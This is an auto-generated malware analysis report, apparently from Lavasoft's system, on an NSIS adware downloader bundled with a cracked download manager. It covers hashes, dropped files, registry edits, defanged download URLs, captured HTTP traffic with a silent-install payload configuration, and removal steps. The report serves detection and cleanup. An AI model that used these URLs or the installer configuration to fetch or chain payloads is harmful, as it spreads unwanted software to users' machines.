Trojan.GenericKD.4573345_38e137fe27
TrojanDownloader:Win32/Adload.DP!bit (Microsoft), Trojan-Downloader.NSIS.Adload.bx (Kaspersky), Trojan.Vittalia.7648 (DrWeb), Artemis!38E137FE27B1 (McAfee), Trojan.Gen (Symantec), Win32:Malware-gen (Avast), TROJ_GEN.R00XC0DBD17 (TrendMicro), Trojan.GenericKD.4573345 (AdAware), Installer.Win32.SmartIM.FD, Trojan.NSIS.StartPage.FD, mzpefinder_pcap_file.YR, InstallerSmartIM.YR (Lavasoft MAS)
Behaviour: Trojan-Downloader, Trojan, Installer, Malware
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
MD5: 38e137fe27b181dc3415456e673eaacb
SHA1: 3e8ea1457fec13c03678767753c482bb432911e9
SHA256: b16fb65febd4ae205fab20423476bf43a0f29c0c44f46de8500725f779b0140d
SSDeep: 49152:bAI lwQVCzKFUcPKlpoVGgAd472Hpbji/P:bAI 2QMiUaKP GgABH1sP
Size: 2066448 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2009-12-06 00:50:52
Analyzed on: Windows7 SP1 32-bit
Summary:
Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
setup.exe:772
open.exe:1968
RTOBwd4yYx.exe:3396
The Trojan injects its code into the following process(es):
%original file name%.exe:1796
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process setup.exe:772 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\$inst\16.tmp (838 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\$inst\7.tmp (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\$inst\4.tmp (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\$inst\2.tmp (14 bytes)
The process %original file name%.exe:1796 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\launch_reb[1].htm (189 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsm2481.tmp\System.dll (23 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsm2481.tmp\vHbOehhRxp (189 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\5934c6c0dd069[1].exe (4648 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsm2481.tmp\RTOBwd4yYx.exe (6029 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsm2481.tmp\inetc.dll (44 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsm2481.tmp\B (32454 bytes)
The Trojan deletes the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsm2481.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsm2480.tmp (0 bytes)
The process open.exe:1968 makes changes in the file system.
The Trojan deletes the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsc9DD4.tmp (0 bytes)
The process RTOBwd4yYx.exe:3396 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr2E12.tmp (1568 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr2E13.tmp\open.exe (7539 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr2E13.tmp\NSISdl.dll (31 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr2E13.tmp\397086727 (956 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr2E13.tmp\nsArray.dll (14 bytes)
The Trojan deletes the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr2E13.tmp\Setup__21223_il2.exe (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr2E11.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr2E13.tmp\397086727 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr2E13.tmp\open.exe (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr2E13.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr2E13.tmp\cpSetup.exe (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr2E13.tmp\sevensetup.exe (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr2E13.tmp\NSISdl.dll (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr2E13.tmp\nsArray.dll (0 bytes)
Registry activity
The process %original file name%.exe:1796 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Tracing\38e137fe27b181dc3415456e673eaacb_RASMANCS]
"FileDirectory" = "%windir%\tracing"
"EnableConsoleTracing" = "0"
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\38e137fe27b181dc3415456e673eaacb_RASAPI32]
"MaxFileSize" = "1048576"
[HKLM\SOFTWARE\Microsoft\Tracing\38e137fe27b181dc3415456e673eaacb_RASMANCS]
"MaxFileSize" = "1048576"
[HKLM\SOFTWARE\Microsoft\Tracing\38e137fe27b181dc3415456e673eaacb_RASAPI32]
"FileDirectory" = "%windir%\tracing"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\38e137fe27b181dc3415456e673eaacb_RASAPI32]
"EnableFileTracing" = "0"
"FileTracingMask" = "4294901760"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKLM\SOFTWARE\Microsoft\Tracing\38e137fe27b181dc3415456e673eaacb_RASAPI32]
"EnableConsoleTracing" = "0"
"ConsoleTracingMask" = "4294901760"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3C 00 00 00 09 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Tracing\38e137fe27b181dc3415456e673eaacb_RASMANCS]
"ConsoleTracingMask" = "4294901760"
"EnableFileTracing" = "0"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"
The process open.exe:1968 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\DDECache\IExplore\WWW_OpenURL]
"processname" = "iexplore.exe"
"WindowClassName" = "DDEMLMom"
Dropped PE files
| MD5 | File path |
|---|---|
| 5d930fa790eed4b6c7dd22262a015723 | c:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\28983039778[1].exe |
| 45a5c7027332eba59179f6fc24c439ce | c:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\5934c6c0dd069[1].exe |
| 45a5c7027332eba59179f6fc24c439ce | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsm2481.tmp\RTOBwd4yYx.exe |
| c17103ae9072a06da581dec998343fc1 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsm2481.tmp\System.dll |
| c498ae64b4971132bba676873978de1e | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsm2481.tmp\inetc.dll |
| 503b679b2ae49e6793ff8da172a8d41f | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsm2481.tmp\setup.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
VersionInfo
No information is available.
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| .text | 4096 | 23628 | 24064 | 4.46394 | 856b32eb77dfd6fb67f21d6543272da5 |
| .rdata | 28672 | 4764 | 5120 | 3.4982 | dc77f8a1e6985a4361c55642680ddb4f |
| .data | 36864 | 154712 | 1024 | 3.3278 | 7922d4ce117d7d5b3ac2cffe4b0b5e4f |
| .ndata | 192512 | 40960 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
| .rsrc | 233472 | 19448 | 19456 | 3.41705 | 537cb102bb82cffd7543847e9c582caa |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Total found: 6
URLs
| URL | IP |
|---|---|
| hxxp://dna4mm5c1mahl.cloudfront.net/launch_reb.php?p=sevenzip&tid=12885062&pid=2268&n=SURNIDYuMjcgQnVpbGQgMyBSZWdpc3RlcmVkICgzMmJpdCArIDY0Yml0IFBhdGNoKSBbQ3JhY2tpbmdQYXRjaGluZ10=&b_typ=pe | |
| hxxp://d1gahxamcuu9d3.cloudfront.net/stub_maker.php?program=sevenzip&tid=12885062&pid=2268&b_typ=pe&reb=1&name=IDM 6.27 Build 3 Registered (32bit + 64bit Patch) [CrackingPatching] | |
| hxxp://dna4mm5c1mahl.cloudfront.net/launch_v5.php?p=sevenzip&pid=2268&tid=12885062&b_typ=pe&n=SURNIDYuMjcgQnVpbGQgMyBSZWdpc3RlcmVkICgz&reb=1&ic= | |
| hxxp://d2yevmf1zg53hf.cloudfront.net/?affId=1006&appTitle=IDM | |
| hxxp://di5k50sh3hqjp.cloudfront.net/get.php?ses=1wJdBdqMTytMQjGzUYywKliRROW1 | |
| hxxp://promos-back.peerdlgo.info/stub/open_maker.php?dl=1 | |
| hxxp://d3vzyycpfbk7qm.cloudfront.net/stats.php?bu=op&c=&step= | |
| hxxp://di5k50sh3hqjp.cloudfront.net/ddl.php?file=77519782 | |
| hxxp://d3vzyycpfbk7qm.cloudfront.net/stats.php?bu=&c=&step=1 | |
| hxxp://d3vzyycpfbk7qm.cloudfront.net/stats.php?bu=&c=&step=2 | |
| hxxp://d3vzyycpfbk7qm.cloudfront.net/stats.php?bu=&c=&step=3 | |
| hxxp://get.ercationiv.club/launch_reb.php?p=sevenzip&tid=12885062&pid=2268&n=SURNIDYuMjcgQnVpbGQgMyBSZWdpc3RlcmVkICgzMmJpdCArIDY0Yml0IFBhdGNoKSBbQ3JhY2tpbmdQYXRjaGluZ10=&b_typ=pe | |
| hxxp://buddy.bellverse.bid/get.php?ses=1wJdBdqMTytMQjGzUYywKliRROW1 | |
| hxxp://gold.bellverse.bid/stub_maker.php?program=sevenzip&tid=12885062&pid=2268&b_typ=pe&reb=1&name=IDM 6.27 Build 3 Registered (32bit + 64bit Patch) [CrackingPatching] | |
| hxxp://meat.detailrobin.bid/?affId=1006&appTitle=IDM 6.27 Build 3 Registered (3&s1=2268&s2=12885062&setupName=cpSetup&appVersion=2.92&instId=11&exe=1 | |
| hxxp://hold.fieldlow.bid/stats.php?bu=&c=&step=1 | |
| hxxp://hold.fieldlow.bid/stats.php?bu=&c=&step=3 | |
| hxxp://spark.comparisoneggs.website/ddl.php?file=77519782 | |
| hxxp://hold.fieldlow.bid/stats.php?bu=&c=&step=2 | |
| hxxp://fun.iciclebone.bid/launch_v5.php?p=sevenzip&pid=2268&tid=12885062&b_typ=pe&n=SURNIDYuMjcgQnVpbGQgMyBSZWdpc3RlcmVkICgz&reb=1&ic= | |
| hxxp://hold.fieldlow.bid/stats.php?bu=op&c=&step= | |
| boo.quincefork.bid | |
| www.bringmethefile.com | |
| dns.msftncsi.com | |
| birth.babieshistory.bid | |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
ET POLICY User-Agent (NSIS_Inetc (Mozilla)) - Sometimes used by hostile installers
ET POLICY PE EXE or DLL Windows file download HTTP
ET TROJAN VMProtect Packed Binary Inbound via HTTP - Likely Hostile
Traffic
GET /stats.php?bu=&c=&step=1 HTTP/1.0
Host: hold.fieldlow.bid
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: close
Date: Mon, 05 Jun 2017 02:50:08 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
X-Cache: Miss from cloudfront
Via: 1.1 36a14b9cb5cc947f05a9a38c2e38f707.cloudfront.net (CloudFront)
X-Amz-Cf-Id: 63oNaA7BJosrOUNYP_2LQdgDUYi6lx3jmSD9WPQnq9ysiPfvfAzIpA==
GET /launch_reb.php?p=sevenzip&tid=12885062&pid=2268&n=SURNIDYuMjcgQnVpbGQgMyBSZWdpc3RlcmVkICgzMmJpdCArIDY0Yml0IFBhdGNoKSBbQ3JhY2tpbmdQYXRjaGluZ10=&b_typ=pe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: get.ercationiv.club
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Content-Length: 189
Connection: keep-alive
Date: Mon, 05 Jun 2017 02:49:36 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
X-Cache: Miss from cloudfront
Via: 1.1 3fe3cb67da7e790ebadf1baabec782f6.cloudfront.net (CloudFront)
X-Amz-Cf-Id: 4HNOGzTT4QPyIG6JHDSvA8-auy7zSIKu4mVV2lp_XcwQgwpkrkKvAg==
s=first
u=hXXp://gold.bellverse.bid/stub_maker.php?program=sevenzip&tid=12885062&pid=2268&b_typ=pe&reb=1&name=IDM 6.27 Build 3 Registered (32bit + 64bit Patch) [CrackingPatching]
GET /ddl.php?file=77519782 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: spark.comparisoneggs.website
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 1962408
Connection: keep-alive
Server: nginx/1.10.1
Date: Mon, 05 Jun 2017 02:50:07 GMT
X-Powered-By: PHP/5.5.38
Content-Description: File Transfer
Content-Disposition: attachment; filename=28983039778.exe
Content-Transfer-Encoding: binary
Expires: 0
Cache-Control: must-revalidate, post-check=0, pre-check=0
Pragma: public
X-Cache: Miss from cloudfront
Via: 1.1 56f2c719aefd3766bb3bccf085790735.cloudfront.net (CloudFront)
X-Amz-Cf-Id: QlL_WkomIEjMzqdpakO4sPEWe-1K705TxRH5rA4a0Rm3SV6ysCJKuw==
<<< skipped >>>
GET /get.php?ses=1wJdBdqMTytMQjGzUYywKliRROW1 HTTP/1.0
Host: buddy.bellverse.bid
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 0
Connection: close
Cache-Control: no-store, no-cache, must-revalidate,post-check=0, pre-check=0
Pragma: no-cache
Expires: Sun, 01 Jan 2014 00:00:00 GMT
Server: Microsoft-IIS/8.5
X-Powered-By: PHP/5.3.28
Access-Control-Allow-Origin: *
Date: Mon, 05 Jun 2017 02:48:50 GMT
X-Cache: Miss from cloudfront
Via: 1.1 9b873c22fb06a32f8142a90b7071aba9.cloudfront.net (CloudFront)
X-Amz-Cf-Id: wmKb3PBlZxZE_ZbsQvffuQi-7zEOszHoiZDImsjtmH8DphzY6F7Qzw==
GET /stub_maker.php?program=sevenzip&tid=12885062&pid=2268&b_typ=pe&reb=1&name=IDM 6.27 Build 3 Registered (32bit + 64bit Patch) [CrackingPatching] HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: gold.bellverse.bid
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/force-download
Content-Length: 76406
Connection: keep-alive
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.3.28
Content-Disposition: attachment; filename="5934c6c0dd069.exe"
X-Powered-By: ASP.NET
Date: Mon, 05 Jun 2017 02:49:37 GMT
X-Cache: Miss from cloudfront
Via: 1.1 3fe3cb67da7e790ebadf1baabec782f6.cloudfront.net (CloudFront)
X-Amz-Cf-Id: VlQOvO2QLlivkwJ-bSq2lk4U2M9zPfA1rQDN1BpPVDIDoQvpcKqK8w==
<<< skipped >>>
GET /stats.php?bu=op&c=&step= HTTP/1.0
Host: hold.fieldlow.bid
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: close
Date: Mon, 05 Jun 2017 02:50:07 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
X-Cache: Miss from cloudfront
Via: 1.1 1e075734d681989d6cd80021b52ec2d1.cloudfront.net (CloudFront)
X-Amz-Cf-Id: _0zm4lEJA6Bzj1dE5Kzxjt8zDBN1Hk2CdVVuyDIeoFGNXEIlXwwrtA==
GET /stats.php?bu=&c=&step=3 HTTP/1.0
Host: hold.fieldlow.bid
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: close
Date: Mon, 05 Jun 2017 02:50:09 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
X-Cache: Miss from cloudfront
Via: 1.1 7d6b3813f81c0a2b16fe143c3b419156.cloudfront.net (CloudFront)
X-Amz-Cf-Id: lr-8SnKRhzchmCSzb2YS2YyFzuPH_w2vbTdBX1BFdb2G_HErmnlyVw==
GET /launch_v5.php?p=sevenzip&pid=2268&tid=12885062&b_typ=pe&n=SURNIDYuMjcgQnVpbGQgMyBSZWdpc3RlcmVkICgz&reb=1&ic= HTTP/1.0
Host: fun.iciclebone.bid
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Content-Length: 956
Connection: close
Date: Mon, 05 Jun 2017 02:49:38 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
X-Cache: Miss from cloudfront
Via: 1.1 7e15ada42c415f2fda8358214d60c6de.cloudfront.net (CloudFront)
X-Amz-Cf-Id: uSQZ-zUfBISMyzOy_eDqXp8UtKGtGjuGVxXytFeL7UUxPx8B4eRAtA==
files=4
t1=dl
u1=hXXp://meat.detailrobin.bid/?affId=1006&appTitle=IDM 6.27 Build 3 Registered (3&s1=2268&s2=12885062&setupName=cpSetup&appVersion=2.92&instId=11&exe=1
n1=cpSetup.exe
b1=cp
c1=sevenzip-1
s1=0
m1=0
d1=0
t2=dl
u2=hXXp://birth.babieshistory.bid/stub_maker_uk2.php?url=hXXp://tragony.info/taveara?q=IDM 6.27 Build 3 Registered (3
n2=sevensetup.exe
b2=rx
c2=sevenzip-1
s2=0
m2=0
d2=0
t3=dl
u3=hXXp://VVV.bringmethefile.com/xdownload.php?version=1.1.5.26&monitor=1&z2=0&ci=21223&appsetupurl=http://pe-sixi.com/downloadS.php?bu=am&prefix=Setup&instid[appname]=installer&instid[cmdline]=/S&instid[appimageurl]=http://pe-sixi.com/img/icon_installer.png
n3=Setup__21223_il2.exe
b3=am
c3=2140-sevenzip
s3=0
m3=0
d3=0
t4=dl
u4=hXXp://promos-back.peerdlgo.info/stub/open_maker.php?dl=1
n4=open.exe
b4=op
c4=sevenzip-1
s4=0
m4=0
d4=0
fn1=Components
fn2=File opener
fn3=File finder
fn4=SevenZip
ftitle=to run your file
itype=silent
GET /?affId=1006&appTitle=IDM 6.27 Build 3 Registered (3&s1=2268&s2=12885062&setupName=cpSetup&appVersion=2.92&instId=11&exe=1 HTTP/1.0
Host: meat.detailrobin.bid
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Connection: close
Server: nginx/1.10.1
Date: Mon, 05 Jun 2017 02:49:40 GMT
X-Powered-By: PHP/5.5.38
Location: hXXp://buddy.bellverse.bid/get.php?ses=1wJdBdqMTytMQjGzUYywKliRROW1
X-Cache: Miss from cloudfront
Via: 1.1 045e5b56f3f7e0d8f206766f7855c6f3.cloudfront.net (CloudFront)
X-Amz-Cf-Id: dd9UcuBg6S8fLdMxNnbg__Bfds5GHP9zc_q38BohDr2ZRnECuPZDvg==
GET /stub/open_maker.php?dl=1 HTTP/1.0
Host: promos-back.peerdlgo.info
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*
HTTP/1.1 200 OK
Content-Type: application/force-download
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.3.28
Content-Disposition: attachment; filename="open.exe"
X-Powered-By: ASP.NET
Date: Mon, 05 Jun 2017 02:50:05 GMT
Connection: close
Content-Length: 51200
<<< skipped >>>
GET /stats.php?bu=&c=&step=2 HTTP/1.0
Host: hold.fieldlow.bid
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: close
Date: Mon, 05 Jun 2017 02:50:08 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
X-Cache: Miss from cloudfront
Via: 1.1 a38c1bb63d8067c45471d0c8040eae61.cloudfront.net (CloudFront)
X-Amz-Cf-Id: fFeJv8tklfXLgsXNho8hyXP1M1ad1xuUaB9Re4jVZUVihMUwRlDusA==
The Trojan connects to the servers at the following location(s):
%original file name%.exe_1796_rwx_10004000_00001000:
iexplore.exe_1972:
iexplore.exe_3348:
setup.exe_772:
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
setup.exe:772
open.exe:1968
RTOBwd4yYx.exe:3396
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\$inst\16.tmp (838 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\$inst\7.tmp (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\$inst\4.tmp (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\$inst\2.tmp (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\launch_reb[1].htm (189 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsm2481.tmp\System.dll (23 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsm2481.tmp\vHbOehhRxp (189 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\5934c6c0dd069[1].exe (4648 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsm2481.tmp\RTOBwd4yYx.exe (6029 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsm2481.tmp\inetc.dll (44 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsm2481.tmp\B (32454 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr2E12.tmp (1568 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr2E13.tmp\open.exe (7539 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr2E13.tmp\NSISdl.dll (31 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr2E13.tmp\397086727 (956 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr2E13.tmp\nsArray.dll (14 bytes)
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.